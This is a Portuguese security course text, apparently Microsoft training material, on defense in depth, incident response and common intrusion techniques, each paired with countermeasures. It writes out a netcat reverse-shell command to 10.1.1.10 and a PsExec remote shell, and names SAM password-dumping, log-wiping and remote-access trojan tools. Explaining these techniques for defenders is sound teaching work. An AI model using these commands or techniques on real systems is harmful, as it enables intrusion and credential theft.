Cap1-17.jpg A proteo dos permetros pode ser obtida principalmente com firewalls. A configurao de um firewall pode representar um desafio tcnico. Por isso, os procedimentos devem detalhar claramente todos os requisitos. Os sistemas operacionais Microsoft Windows mais recentes facilitam o bloqueio de portas de comunicao desnecessrias para reduzir o perfil de ataque de um computador. A converso de endereo de rede (NAT, network address translation) permite que uma organizao encubra configuraes de porta interna e de endereo IP para impedir que os usurios mal-intencionados ataquem sistemas internos com informaes de rede roubadas. Os mecanismos de segurana do permetro tambm podem ocultar servios internos mesmo os que precisam estar disponveis externamente de forma que um usurio mal-intencionado nunca se comunique diretamente com outro sistema, alm do firewall, a partir da Internet. Quando os dados deixam o ambiente pelo qual voc responsvel, importante que eles estejam em um estado que garanta sua chegada segura e intacta ao seu destino. Isso pode ser feito usando protocolos de criptografia e de encapsulamento para criar uma rede virtual privada (VPN, virtual private network). O protocolo de encapsulamento usado pelos sistemas Microsoft o protocolo PPTP, usando a criptografia ponto a ponto da Microsoft (MPPE); ou o protocolo L2TP, usando a criptografia IPSec.

Quando os computadores remotos esto estabelecendo comunicaes atravs de uma VPN, as organizaes podem seguir etapas adicionais para examinar esses computadores de forma a garantir que eles esto em conformidade com uma diretiva de segurana predeterminada. Os sistemas de conexo entram em quarentena em uma parte separada da rede at que as verificaes de segurana terminem. Os sistemas no permetro tambm devem ter usos definidos claramente. Bloqueie ou desabilite qualquer outra funcionalidade. O firewall do Windows, que est includo no Windows XP e no Windows Server 2003, pode estender a proteo do permetro para usurios remotos.

1.34.

Descrio da camada de rede interna


Error: Reference source not found Cap1-18.jpg

Os ataques no se originam apenas de fontes externas. Independentemente de sofrerem ataques internos autnticos ou simples acidentes, muitos sistemas e servios so danificados. importante implementar a segurana interna para interromper ameaas mal-intencionadas e acidentais.

1.35.

Comprometimento da camada de rede interna

Error: Reference source not found Cap1-19.jpg O acesso aos sistemas internos e aos recursos da rede permite que um usurio mal-intencionado obtenha acesso mais facilmente aos dados organizacionais. O acesso infra-estrutura de rede tambm permite que um usurio malintencionado monitore a rede e investigue o trfego que est sendo transportado. Redes totalmente roteadas, apesar de tornarem a comunicao mais fcil, permitem que um usurio mal-intencionado acesse recursos nessa mesma rede independente do local onde esteja na rede. Os sistemas operacionais de rede tm vrios servios instalados. Cada servio de rede um ponto potencial de ataque.

1.36.

Proteo da camada de rede interna

Para ajudar a proteger o ambiente de rede interno, voc deve requerer que cada usurio seja autenticado de forma segura com um controlador de domnio e com os recursos que eles esto acessando. Usar autenticao mtua, de forma que o cliente tambm conhea a identidade do servidor, para impedir cpia acidental de dados para um sistema do usurio malintencionado. Alterne fisicamente o segmento, ou particione uma rede de forma que toda a rede no esteja disponvel de um nico ponto. Voc pode atingir o particionamento usando comutadores (switches) e roteadores de rede separados ou criando vrias redes de rede local virtuais (VLANs) no mesmo comutador fsico. Considere como a configurao dos dispositivos de rede, como comutadores, ser gerenciada. Por exemplo, a equipe da rede pode usar o Telnet para se conectar a um comutador ou roteador para fazer alteraes na configurao. O Telnet passa todas as credenciais de segurana em um texto puro. Isso significa que os nomes de usurio e as senhas podem ser acessados por qualquer pessoa que entre naquele segmento de rede. Isso representa uma grande vulnerabilidade de segurana. Considere permitir o uso de apenas um mtodo de criptografia seguro, como um SSH de shell seguro ou o acesso ao terminal serial direto. Voc tambm deve guardar de forma adequada as cpias de backup das configuraes do dispositivo de rede. As cpias de backup podem revelar informaes sobre a rede que so teis para o usurio mal-intencionado. Se uma vulnerabilidade for detectada, voc pode usar os backups da

configurao do dispositivo a fim de executar uma restaurao rpida de um dispositivo para uma configurao mais segura. O trfego deve ser restrito mesmo quando ele segmentado. Em redes locais conectadas e sem fio, voc pode usar o 802.1X para fornecer acesso criptografado e autenticado. Esta soluo pode usar contas e senhas do Active Directory ou certificados digitais para autenticao. Se usa certificados, voc precisar uma infra-estrutura de chave pblica (PKI, Public Key Infrastructure) criada no Windows Certificate Services; para senhas ou certificados, voc tambm precisar de um servidor RADIUS criado no Servio de Autenticao da Internet (IAS) do Windows. Os servios de certificado e o IAS esto includos no Windows Server 2003. Implemente tecnologias de criptografia e de assinatura, como IPSec ou assinatura SMB, para impedir que os usurios mal-intencionados rastreiem pacotes da rede e os usem novamente.

1.37.

Descrio da camada do host

Cap1-20.jpg Normalmente, os computadores em uma rede tm funes especficas. Isso afeta a segurana aplicada a eles.

1.38.

Comprometimento da camada de host


Error: Reference source not found

Cap1-21.jpg Os hosts de rede podem ser atacados usando funes que normalmente esto disponveis por padro, mesmo se eles no forem necessrios para que o servidor execute sua funo de rede. Os usurios mal-intencionados tambm distribuem vrus para executar um ataque automatizado. O software instalado em sistemas de computador pode ter pontos fracos que os usurios mal-intencionados podem explorar. importante permanecer atualizado com todas as questes de segurana para todos os softwares do seu ambiente.

1.39.

Proteo da camada do host

Deve-se avaliar cada host em seu ambiente e criar diretivas que limitem cada servidor exclusivamente s tarefas que devem ser realizadas. Isso cria uma outra barreira de segurana, que um atacante precisar ultrapassar antes de provocar qualquer dano.

Fortalecimento do servidor, deteco de invaso do host, filtragem IPSec, auditoria Nos sistemas cliente e servidor, as tcnicas de fortalecimento dependero da funo do computador. Em cada caso, voc pode usar modelos de segurana e administrativos com a diretiva de grupo para proteger esses sistemas. Em sistemas cliente, voc tambm pode usar a diretiva de grupo para restringir privilgios de usurio e para controlar a instalao de software. O uso da diretiva de grupo para restringir os aplicativos que podem ser executados pelo usurio pode impedir que o usurio execute inadvertidamente um cdigo Trojan. Em servidores, as tcnicas de fortalecimento tambm incluem a aplicao de permisses NTFS, definio de diretivas de auditoria, filtragem de portas e execuo de tarefas adicionais com base na funo do servidor. Manter os patches do servidor e do cliente atualizados tambm melhora a segurana. A Microsoft fornece vrias formas de aplicar patches a sistemas, incluindo o Windows Update, o Software Update Service e o Microsoft Systems Management Server (SMS). O uso de um pacote antivrus real e um firewall pessoal, como o firewall do Windows, disponvel no Windows XP e em sistemas operacionais posteriores, pode reduzir bastante a superfcie de ataque de um computador cliente.

1.40.

Descrio da camada de aplicativo

Cap1-22.jpg Os aplicativos de rede permitem que os clientes acessem e manipulem dados. Eles tambm so um ponto de acesso para o servidor no qual os aplicativos esto sendo executados. Lembre-se de que o aplicativo est fornecendo um servio para a rede. Esse servio no deve ser impedido pela implementao de segurana. Examine os aplicativos desenvolvidos internamente e os aplicativos comerciais por questes de segurana.

1.41.

Comprometimento da camada de aplicativo

Cap1-23.jpg Error: Reference source not found Os usurios mal-intencionados voltados para aplicativos podem corromper o aplicativo para tornar sua funcionalidade indisponvel. Os aplicativos podem conter falhar que os usurio mal-intencionados podem manipular para executar cdigos mal-intencionados no sistema. Um usurio mal-intencionado pode usar um servio em excesso de forma que o uso legtimo seja impossvel; esse um tipo de ataque de negao de servio. Um aplicativo tambm pode ser usado para executar tarefas no pretendidas, como rotear emails.

1.42.

Proteo da camada do aplicativo

Como outra medida defensiva, o Fortalecimento de Aplicativos uma parte essencial de qualquer modelo de segurana. Cada aplicativo em uma organizao deve ser testado minuciosamente quanto conformidade de segurana em um ambiente de teste antes de ser colocado em produo. Verificaes de validao, verificao de origens de HTML/cookies, IIS seguro As instalaes de aplicativos devem incluir somente servios e funcionalidade necessrios. Os aplicativos desenvolvidos internamente devem ser verificados para ver se h vulnerabilidades de segurana de forma continuada e os patches devem ser desenvolvidos e implantados para qualquer vulnerabilidade identificada. Os aplicativos que esto sendo executados na rede devem ser instalados com segurana e devem ter todos os service packs e pacthes aplicados. O software antivrus deve estar sendo executado para ajudar a impedir a execuo de cdigo mal-intencionado. Se um aplicativo for comprometido, o usurio mal-intencionado pode acessar o sistema com os mesmos privilgios sob os quais o aplicativo est sendo executado. Por isso, execute servios e aplicativos com o mnimo de privilgios necessrio. Quando novos aplicativos personalizados forem desenvolvidos, use as prticas recomendadas de engenharia de segurana mais recentes no desenvolvimento de aplicativos.

1.43.

Descrio da camada de dados


Error: Reference source not found Cap1-24.jpg

O camada final so os dados. Os computadores armazenam, processam e servem dados. Quando os dados so processados de uma forma significativa, eles se tornam informaes teis. Tanto os dados quanto as informaes que um sistema armazena so alvos para um ataque. O sistema mantm os dados na mdia de armazenamento em massa, normalmente um disco rgido. Todas as verses recentes do Microsoft Windows oferecem suporte a vrios sistemas de arquivo para armazenar e acessar arquivos em um disco. Um desses, o NTFS, pode ser usado pelo Microsoft Windows NT, pelo Windows 2000, pelo Windows XP e pelo Microsoft Windows Server 2003. Ele fornece permisses de arquivo e de pasta para ajudar a proteger os dados. O NTFS oferece suporte a recursos adicionais, como a auditoria e o sistema de arquivos com criptografia (EFS, Encrypting File System), que pode ser usado para implementar a segurana dos dados.

1.44.

Comprometimento da camada de dados


Error: Reference source not found Cap1-25.jpg

Os usurios mal-intencionados que tm acesso a um sistema de arquivos podem causar um dano enorme ou obter vrias informaes. Eles podem exibir arquivos de dados e documentos, alguns dos quais contm informaes importantssimas. Eles tambm podem alterar ou remover as informaes, o que pode causar vrios problemas para uma organizao. O servio de diretrio do Active Directory usa arquivos no disco para armazenar as informaes de diretrio. Esses arquivos so armazenados em um local padro quando o sistema promovido para um controlador de domnio. Como parte do processo de promoo, seria importante armazenar os arquivos em algum outro lugar diferente do padro, pois dessa forma estariam escondidos dos usurios mal-intencionados. Como os nomes dos arquivos so bem conhecidos (com o nome de arquivo NTDS.dit), realocar esses arquivos serve provavelmente apenas para reduzir um ataque. Se os arquivos do diretrio forem comprometidos, ele coloca todo o ambiente do domnio em risco.

Os arquivos de aplicativo tambm so armazenados no disco e abertos para ataque, fornecendo aos usurios mal-intencionados a oportunidade de quebrar o aplicativo ou manipul-lo com finalidades mal-intencionadas.

1.45.

Proteo da camada de dados

O EFS permite a criptografia de arquivos medida que residem no sistema de arquivos. Ele depende do disco que est sendo formatado com o NTFS e est disponvel desde o Windows 2000. importante compreender que o EFS no criptografa arquivos enquanto esto transitando por uma rede. O processo de criptografia usa uma chave de criptografia de arquivo para criptografar o arquivo e uma tecnologia de chave pblica/privada para proteger a chave de criptografia do arquivo. O NTFS tambm fornece segurana no nvel do arquivo e da pasta. Isso permite a criao de listas de controle de acesso para definir quem tem acesso a um arquivo e o acesso que eles tm. Aumentar a proteo da camada de dados precisa ser uma combinao de listas de controle de acesso e de criptografia. A criptografia de um arquivo impede acesso somente leitura no autorizado; ela no impede uma ao que no requeira a leitura do arquivo, como a excluso. Para impedir a excluso, use listas de controle de acesso. Como os dados so cruciais em vrios negcios, importante que a sua recuperao seja um processo conhecido e comprovado. Se houver backups regulares, qualquer violao ou remoo de dados, acidental ou mal-intencionada, pode ser recuperada dos backups em tempo. Um processo de backup e restaurao confivel vital em qualquer ambiente. Alm disso, fitas de backup e de restaurao devem ser protegidas. As cpias das fitas de backup e de restaurao devem ser mantidas em um local seguro e distante. O acesso no autorizado s fitas de backup to prejudicial quanto uma violao fsica de sua infra-estrutura. As listas de controle de acesso funcionam somente em documentos dentro do sistema de arquivos para o qual foram habilitadas. Depois que os documentos forem copiados para outro local (por exemplo, o disco rgido local de um usurio), no h mais controle de acesso. O Windows Rights Management Services (RMS), fornecido com o Windows Server 2003, move a funo de controle de acesso para o prprio objeto de forma que o controle seja aplicado independente do local onde o documento est fisicamente armazenado. O RMS tambm fornece aos criadores de contedo maior controle sobre determinadas aes que um consumidor pode executar por exemplo, o destinatrio pode ter acesso de leitura a um documento, mas no pode imprimi-lo, copi-lo e col-lo; em emails enviados pelo Microsoft Office Outlook 2003, o remetente da mensagem pode impedir que os destinatrios a encaminhem.

1.46.

Resposta a incidentes de segurana

Neste tpico, iremos nos concentrar em como responder incidentes de segurana. Especificamente, abordaremos: Usando uma lista de verificao de resposta a incidentes. Contendo os efeitos de um ataque. Identificao de riscos de segurana

1.47.

Cap1-32.jpg Determinar os riscos de segurana, talvez lhe ajude a responder a pergunta "qual seria o prejuzo para a empresa se" Tente pensar nas maneiras como a sua rede poder ser comprometida e no impacto disso sobre os seus negcios. Isso pode incluir aplicativos de linha de negcios, dados do cliente etc. Uma vez formulada uma lista, identifique o que poder prejudicar mais os seus negcios, em caso de comprometimento. Os possveis danos podem incluir:

Tempo de inatividade Perda de negcios Reputao prejudicada Confiana do cliente Uso fraudulento das informaes Responsabilidade legal

Depois que voc identificar os possveis riscos, pergunte-se "o que posso fazer para atenuar o risco?" Para obter mais informaes, consulte o livro Windows Security Resource Kit da Microsoft Press, bem como Microsoft Solution for Securing Windows 2000 http://go.microsoft.com/fwlink/?LinkId=14837 1.48. Tcnicas de invaso

Cap1-33.jpg

Levantamento de informaes Varredura Enumerao Obteno de acesso Elevao de privilgios Saturaes de buffer Shovel a Shell Controle interativo Camuflagem Coleta de informaes Island Hopping Negao de servio Engenharia social

Vamos analisar algumas tcnicas comuns de invaso. Quanto mais informaes voc tiver sobre as tcnicas utilizadas pelos hackers, mais proteo poder oferecer sua rede contra elas. Observao: este no um manual sobre como atacar sistemas e sim uma descrio das tcnicas usadas pelos atacantes. 1.48.1. Tcnicas de invaso: Levantamento de informaes

O uso de ferramentas e informaes por um atacante para criar um perfil completo da posio da segurana de uma organizao conhecido como levantamento de informaes (footprinting). Por exemplo, antes de atacar uma rede, o hacker deseja conhecer as informaes que ela contm: A presena da empresa na Internet/extranet. A diretiva da empresa com relao a acesso remoto. A verso dos softwares utilizados nos servidores (IIS, Exchange etc.) Os intervalos IP dos quais a organizao proprietria. Os desafios tcnicos enfrentados pela empresa. As fuses ou as aquisies feitas recentemente, em andamento ou pendentes.

H muitas ferramentas que podem ajudar um hacker a reunir todas as informaes sobre uma empresa. Podem ser to simples como usar um mecanismo de pesquisa para localizar as informaes, como as que definem os detalhes tcnicos de um administrador, ou usar o USENET ou detalhes includos na publicidade de uma empresa. Quanto mais informaes um atacante tiver antes de iniciar o seu ataque, mais fcil ser identificar uma vulnerabilidade especfica na infra-estrutura.

1.48.2.

Tcnicas de invaso: Varredura

Como resultado do levantamento de informaes, um hacker pode identificar a lista da rede e os endereos IP utilizados na empresa. O prximo passo lgico para um hacker a varredura (scanning). O atacante utiliza ferramentas e informaes para determinar que sistemas esto ativos e acessveis pela Internet, assim como que portas esto em escuta em qualquer sistema especfico. De posse dessas informaes, o atacante pode indicar os sistemas especficos que funcionam com determinados softwares ou servios usando mtodos conhecidos. 1.48.3. Tcnicas de invaso: Enumerao

Enumerao (enumeration) implica o uso de ferramentas por um atacante para obter informaes detalhadas sobre um sistema remoto - por exemplo, servios em execuo, todos os compartilhamentos, contas de usurios, grupos, membros de um domnio, diretivas de contas, bloqueio, durao da senha etc. Normalmente, os hackers utilizam enumerao no intrusiva testando se as informaes obtidas so suficientes para um ataque. Observao: RestrictAnonymous = 1 derrotado facilmente pelas ltimas ferramentas de enumerao (NBTEnum2.1.exe, DumpSec). RestrictAnonymous= 2 pode afetar a funcionalidade. essencial testar sistemas crticos para garantir que as alteraes na segurana no afetaro os sistemas de produo de uma maneira negativa. Renomear as contas administrativas uma boa medida para no utilizar RestrictAnonymous configurado com valor =2 ou bloquear o acesso a portas. Uma variedade de ferramentas consegue identificar contas administrativas com base em SID/RID enumeradas por meio de consultas ao NetBIOS. Finalidade: O uso de informaes detalhadas sobre o sistema remoto, servios, compartilhamentos, contas de usurios, grupos, informaes de controladores de domnio, diretivas de contas etc. permite que o atacante utilize ferramentas com o objetivo de atacar a segurana de contas e servios no sistema-alvo. 1.48.4. Tcnicas de invaso: Redirecionamento de porta

Quando existe um firewall configurado para bloquear determinadas portas de acesso de entrada, um hacker pode usar o redirecionamento de porta (port redirection) como caminho de acesso rede. O redirecionamento de porta utilizado para monitorar algumas portas. Os pacotes so redirecionados para destinos especficos.

Observao: O redirecionador de porta precisa se instalar em um servidor por trs do firewall. Ele precisa usar algum outro mtodo de explorao (saturao de buffer do IIS, etc.). Normalmente, as outras normas de segurana atenuaro bastante o risco desse tipo de ataque. Ele tambm precisa usar uma diretiva IPSec para permitir o acesso s portas abertas das mquinas especficas. Em geral, a filtragem de entrada parece ser a parte importante, mas a filtragem de sada tambm importante! Em outras palavras, se um servidor IIS s precisar conversar com um nico servidor COM+ em uma DMZ com vrias portas, configure uma diretiva IPSec para isso, no permita a comunicao desse servidor IIS com qualquer servidor na rede, em qualquer porta, e filtre o trfego de sada tambm! Alm disso, mantenha-se informado do tipo de excedente de trfego em qualquer porta especfica. Se voc perceber que o trfego ICMP, que deveria ter carga til zero do octeto, contm uma carga til de 500k ou de trfego de TFTP na porta 80, fique alerta, principalmente se isso no fizer parte das suas operaes padro. Finalidade: Depois que identificar e acessar o trfego do firewall, que pode permitir trfego de entrada de uma porta de origem 53, o atacante tentar instalar um software redirecionador de porta no computador, dentro do firewall. O redirecionador de porta enviar o trfego de entrada destinado a uma porta (53) para outro computador atrs do firewall em outra porta (3389). Exemplo: FPipe.exe ferramenta de redirecionamento de porta de linha de comando. Medidas defensivas: O redirecionador de porta deve ser instalado de alguma maneira em um servidor atrs do firewall usando um outro mtodo (saturao de buffer do IIS etc.). A aplicao de normas de segurana atenuar o risco desse tipo de ataque. Utilize uma diretiva IPSec para permitir o acesso apenas s portas abertas das mquinas especficas. 1.48.5. Tcnicas de invaso: Obteno de acesso

H vrias ferramentas disponveis que podem permitir que um hacker assuma o controle de um sistema. Por exemplo, Samdump e Brutus so crackers de senhas. Samdump utilizada para extrair as partes da senha dos arquivos SAM. Brutus um cracker de senha remoto. Se um hacker conseguir acesso a uma cpia de um

banco de dados SAM, ele poder utilizar l0phtcrack e extrair as senhas e os nomes de usurios exatos. ATACAR O SAM ENQUANTO ESTIVER ONLINE Finalidade: Os atacantes conseguem obter as partes da senha do SAM em um sistema online para comprometer contas adicionais. Eles utilizam ferramentas, por exemplo o PWdump2, que empregam uma tcnica conhecida como injeo de DLL para injetar cdigo mal-intencionado em LSASS.EXE (um processo confivel). O LSASS pode solicitar partes de senha descriptografadas para violar a proteo de SYSKEY. Exemplos: Samdump Pwdump1,2,3,3e LC3 / LC4 Medidas defensivas: SYSKEY est habilitado, por padro, no Windows 2000 no modo 0 e criptografa com partes de 128 bits. A chave para descriptografar est armazenada no Registro. Ferramentas recm-lanadas, como PWDump3,3e e LC3 (que usam PWDump), podem violar todas as protees de SYSKEY, em todos os modos, para extrair as senhas. Evitar que um atacante descarregue partes da senha a melhor medida defensiva, mas para uma maior segurana, faa o seguinte: Desabilite a opo de salvar as senhas com hash LM no Registro (habilitado por padro). Assim que fizer isso, mude todas as senhas! Exija senhas complexas (recomendamos 15 caracteres alfanumricos; por exemplo: !@#$%^&*-)

ATACAR UMA CPIA OFFLINE DO SAM Finalidade: O ISS oferece inmeros mtodos para se obter uma cpia do SAM. O acesso fsico incorreto pode conceder acesso ao SAM. Exemplo: disco ERD esquecido na unidade de disquete, os administradores locais se esquecem de bloquear o console. Isso permite obter uma cpia do SAM com o objetivo de conseguir partes de senhas!

Exemplo: A CHNTPW uma ferramenta que funciona com UNIX e DOS. Um disquete de inicializao UNIX est disponvel e voc pode obter uma cpia do SAM, SYSTEM e SECURITY em uma unidade de RAM para ver e editar diretamente com CHNTPW. Se a proteo SYSKEY estiver habilitada (padro no SAM do Windows 2000), CHNTPW no poder descriptografar os hashes armazenados no SAM, mas poder gravar novos hashes nesse SAM, permitindo que o atacante troque a senha de uma conta (por exemplo, administrador). Com essa conta, ele poder iniciar uma sesso e obter o resto das senhas (usando PWDump3 etc.). Medidas defensivas: No permitir a cpia do SAM. Desabilitar o armazenamento de senhas com hash LM no SAM. Habilitar SYSKEY no modo 2 ou 3 para exigir uma senha ou um disquete com a chave privada antes iniciar uma sesso. Se um atacante conseguir desabilitar SYSKEY e gravar uma nova senha para o administrador no SAM, todas os hashes de senha do resto das contas continuaro criptografados e protegidos contra ataque. Observaes: para desabilitar o armazenamento de hash LM no SAM, consulte o seguinte artigo do KB: Q299656 New Registry Key to Remove LM Hashes from AD & SAM http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q299656 SYSKEY foi desenvolvido para criptografar todos os hashes de senha no SAM, de forma a evitar violao offline (Q143475 Windows NT System Key Permits Strong Encryption of the SAM) http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q143475) Desabilitado, por padro, no NT 4.0 e habilitado no modo 0 no Windows 2000. 1.48.6. Tcnicas de invaso: Elevao de privilgios

Um hacker pode causar grandes danos conseguindo privilgios administrativos em uma rede. Ele pode usar vrios utilitrios para obter esses privilgios. Por exemplo, o utilitrio Getadmin.exe usado para conceder privilgios administrativos a usurios comuns adicionando esses usurios ao grupo de administradores. Esse utilitrio funciona com todas as contas, exceto com a conta de Convidado (Guest). importante observar se o direito "Depurar Programas" foi concedido a alguma conta. Se tiver sido, sempre ser possvel executar Getadmin.exe de maneira satisfatria, mesmo depois da aplicao do hotfix. Isso porque o direito "Depurar Programas" permite que o usurio seja adicionado a qualquer processo. Esse direito concedido inicialmente a Administradores e deve ser utilizado apenas com usurios altamente confiveis.

Alm disso, se Getadmin.exe for executado com uma conta que j seja membro do grupo local de administradores, ele continuar funcionando (inclusive depois da aplicao do hotfix). Observao: para obter mais informaes, consulte: http://support.microsoft.com/default.aspx?scid=kb;en-us;146965 1.48.7. Tcnicas de invaso: Saturaes de buffer

Algumas ferramentas de ataque executam cdigo de saturao de buffer. Substituindo segmentos especficos da memria, o atacante pode redirecionar uma chamada da memria dentro de um programa para chamar o seu prprio cdigo, em vez do cdigo previsto. Essa chamada funcionaria mais no contexto de segurana do processo de chamada do que no nvel de privilgio do usurio. Finalidade: As ferramentas de saturao de buffer saturam os buffers no verificados e geram cdigo em aplicativos de servidor para causar shellcode e serem executados automaticamente (geralmente no contexto SYSTEM ou IWAM, se explorar IIS/SQL etc.) Exemplos: JILL-WIN32.EXE Explora saturao do IIS .printer IIS5hack.exe ISPC.EXE Explora saturao do IIS .idq Unicodeloader.pl HTTPODBC.DLL Saturaes de buffer SQL Medidas defensivas: Manter os hotfixes atualizados. Desabilitar servios desnecessrios. Negar protocolos no necessrios no roteador/firewall (filtragem de entrada/sada). Empregar um sistema IDS atualizado para negar pedidos suspeitos, conhecidos como assinaturas de ataque. 1.48.8. Finalidade: Tcnicas de invaso: Shovel a Shell

Ferramentas de shell remoto permitem que os atacantes acessem o "shell de comando remoto" no servidor de destino. Os atacantes usam o shell remoto para elevar os seus privilgios. Exemplos: Netcat Nc.exe testa uma conexo bruta com servidores remotos via TCP. Pode funcionar como servidor ou cliente. Cryptcat igual a Netcat, mas criptografa os dados via um canal TCP. Nc.exe 10.1.1.10 5000 e cmd.exe shovel a shell de um servidor comprometido novamente para uma mquina remota cliente que funciona monitorando o endereo 10.1.1.10 na porta 5000. PSExec.exe \\192.168.1.1 cmd.exe Requer acesso administrativo. Requer acesso a NetBIOS (TCP 139). Esse comando contata o servidor 192.168.1.1, executa CMD.EXE de forma remota e estabelece conexo com o shell de comando do cliente. Medidas defensivas: O Netcat (nc.exe) pode estabelecer uma conexo TCP com o servidor de destino em qualquer porta que esteja na escuta e no esteja sendo utilizada. por esse motivo que uma filtragem apropriada no firewall evita esse tipo de ataque. Diretivas IPSec para permitir a entrada de trfego exclusivamente pelas portas onde so executados servios um mtodo eficaz (permitir trfego apenas na porta 80 em servidores IIS e negar todo o trfego em outras portas). 1.48.9. Tcnicas de invaso: Controle interativo

Finalidade: Chamadas de RATs (Remote Administration Tools, ferramentas de administrao remota). So ferramentas reais e criteriosas de administrao remota contidas em programas .exe chamados aleatoriamente (ou camuflados em programas .exe legtimos). Isso permite que um usurio remoto realize qualquer ao distncia atravs de uma porta da sua escolha, sem a necessidade de um usurio local do sistema! Recursos conhecidos: registros de pressionamentos de teclas, dedicados a gravar senhas de servios populares (AIM, ICQ, compartilhamentos de arquivos etc.), tambm podem criar compartilhamentos de arquivos e transferir arquivos, rea de trabalho remota, execuo remota, sistema de reinicializao etc. Exemplos: Sub7, BO2k, NetBus, NT Rootkit Sub7 o mais popular, e NT Rootkit o mais avanado.

Medidas defensivas: Visto que a maioria dos Cavalos de Tria monitora uma porta para possibilitar o acesso remoto do atacante, uma filtragem apropriada das portas seria o indicado para prevenir esse ataque. A maioria dos produtos antivrus detecta esses ataques e suas variantes, mas a cada hora surgem literalmente milhares de variantes novas. Em geral, chegam como anexos de arquivos via email; portanto, no habilite email/navegao na Internet em servidores e controle os anexos atravs da funcionalidade de segurana de email do Outlook/Exchange, de diretivas de restrio de software, de filtros no gateway SMTP ou no servidor de email etc. A maioria dos Cavalos de Tria tenta modificar Run/RunOnce e outras configuraes de execuo automtica. Pode-se utilizar software de monitoramento, como o NetIQ, que pode avisar por meio de alertas sobre eventos de modificao dessas chaves do Registro. A aplicao de permisses de ACLs a essas chaves pode reduzir (mas no eliminar) esses ataques. 1.48.10. Tcnicas de invaso: Camuflagem

Depois que um hacker conseguir entrar em uma rede, ele procurar no deixar rastros da sua presena e dos seus passos para os administradores. Para isso, ele pode utilizar vrias ferramentas. Por exemplo, WinZapper e Elsave podem ser utilizadas para apagar registros dos logs de eventos. s vezes, os atacantes utilizam NT Rootkits. Nesse tipo de ataque, determinados arquivos so substitudos por verses modificadas. Quando um administrador utiliza o executvel, o atacante obtm informaes adicionais para continuar o seu ataque. Da mesma forma, elementos de sada especficos podem ser mascarados pelo rootkit para camuflar as ferramentas de ataque que so executadas no sistema. Um mtodo comum para detectar arquivos modificados comparar a verso no hash de um arquivo limpo. importante observar que a comparao deve ser feita em uma mquina limpa, usando mdia confivel, pois tambm possvel que qualquer utilitrio de ataque tenha comprometido o sistema em questo. Finalidade: Alertar o atacante que algum est investigando. Pode ser utilizado para executar programas destrutivos em nome do administrador ou para instalar Cavalos de Tria Backdoor. Exemplos: Substituir os comandos do sistema por comandos do Cavalo de Tria. Substituir tlist.exe, kill.exe etc. por verses especiais que no listem nem detenham processos do atacante. Substituir CMD.EXE por uma verso do atacante.

Medidas defensivas: Gerar as chaves MD5 para todos os arquivos importantes do sistema e comprovar hashes com freqncia. Configurar uma auditoria adequada de arquivos. Usar permisses apropriadas para os arquivos. 1.48.11. SNIFFING Finalidade: Depois de utilizar um sniffer (farejador), o atacante estar em condies de obter nomes de contas e senhas que passem pela rede em texto simples. Pode ser utilizado para descobrir outras redes/computadores que possam ser comprometidos no futuro. Pode ser utilizado para descobrir outros sniffers. Netmon utiliza difuses do protocolo BONE. Os computadores Windows respondem, por padro, a solicitaes ARP (o Unix pode restringir respostas ARP). Exemplos: WinDump o sniffer de linha de comando para Windows semelhante a TCPDump para Unix. Ethereal o sniffer OSS com interface grfica semelhante ao programa de monitoramento de rede. ScoopLM dedicado a sniffer de hash NTLM. LC3 usado para captura de hash. Medidas defensivas: Usar a ltima verso do NTLM V2 ou Kerberos (recomendado) em todos os computadores da rede. Usar IPSec para criptografar o trfego da rede. Usar redes comutadas para evitar a captura de pacotes. 1.48.12. Tcnicas de invaso: Island Hopping Tcnicas de invaso: Coleta de informaes

Island Hopping uma tcnica de invaso em que o hacker penetra em uma rede de computadores vulnerveis e depois, a partir deles, passa para partes mais seguras da rede. Utiliza basicamente as mesmas tcnicas discutidas anteriormente para aumentar a sua influncia dentro de um determinado ambiente de rede. O atacante pode simplesmente comprometer um servidor Web sem interesse e sem a segurana apropriada, mas atacar a rede corporativa inteira, onde existem dados mais importantes para a empresa, muito mais atraente para eles.

HASH CRAMMING Permite que o usurio tenha acesso ao sistema sem quebrar a senha, inserindo um hash capturado diretamente da memria. Essa tcnica pode acelerar um ataque porque o atacante no precisa primeiro adivinhar a senha de uma conta. 1.48.13. Tcnicas de invaso: Engenharia social

a natureza humana. De maneira geral, a nossa satisfao em participar do sucesso de outros. Os atacantes utilizam essa opo com freqncia. Sem realizar praticamente nenhuma ao, o atacante obtm informaes que de outra maneira no estariam disponveis. Um exmio atacante social pode enganar os funcionrios da empresa para que divulguem informaes, como nomes de servidores, nmeros de modem, endereos IP, configuraes de rede, diretivas de senha, nomes de contas ou outras informaes privilegiadas que sejam teis em um ataque. 1.48.14. Tcnicas de invaso: Negao de servio

Um atacante no precisa necessariamente acessar um sistema para causar problemas significativos. Os ataques Negao de Servio (DoS, Denial of Service) realizam tarefas nos servios com a finalidade de impedir o seu funcionamento normal. Os exemplos incluiriam ter todas as conexes de rede em um nico servidor ou sobrecarregar um servidor de email com mais emails do que ele pode processar. Os ataques DoS podem ser diretos ou causados por vrus, worms ou Cavalos de Tria. Os objetivos dos ataques DoS podem ser: CPU Espao em disco Largura de banda da rede Qualquer recurso ou servio

1.49.

Lista de verificao de resposta a incidentes

Error: Reference source not found Cap1-26.jpg Ter planos e procedimentos de resposta a incidentes claros, abrangentes e bem testados a chave para permitir uma reao rpida e controlada a ameaas. Para limitar o impacto de um ataque, importante que a resposta ao ataque seja rpida e completa. Para que isso acontea, os sistemas de monitoria e de auditoria devem funcionar. Depois que um ataque for identificado, a sua resposta depender do tipo do ataque. Comunique o fato de que o ataque ocorreu a todas as pessoas relevantes. Da forma mais precisa possvel, contenha o impacto do ataque. Tome medidas preventivas para garantir que o ataque no ocorra novamente. Crie a documentao para especificar a natureza do ataque, como ele foi identificado e como foi combatido.

1.50.

Contendo os efeitos de um ataque Quando um sistema atacado, ele deve ser desligado e removido da rede. Os outros sistemas na rede devem estar protegidos. Os servidores afetados devem ser mantidos e analisados e as descobertas devem ser documentadas. Pode ser muito difcil atender aos padres legais para preservao de evidncia e ainda ser capaz de seguir em frente com os negcios dirios. Um plano detalhado para preservao da evidncia que atenda aos requisitos legais na sua jurisdio deve ser desenvolvido junto com os advogados da empresa de forma que um exista um plano quando a rede for atacada.

1.51.

Cenrios de ataque

Neste tpico da agenda, abordaremos os cenrios de ataque. Especificamente, discutiremos estes cenrios: Um worm que ataque a porta 135 do UDP Um worm de email Um ataque que infecta um computador antes que patches ou correes sejam aplicados

1.52.

Worm atacando porta 135 UDP

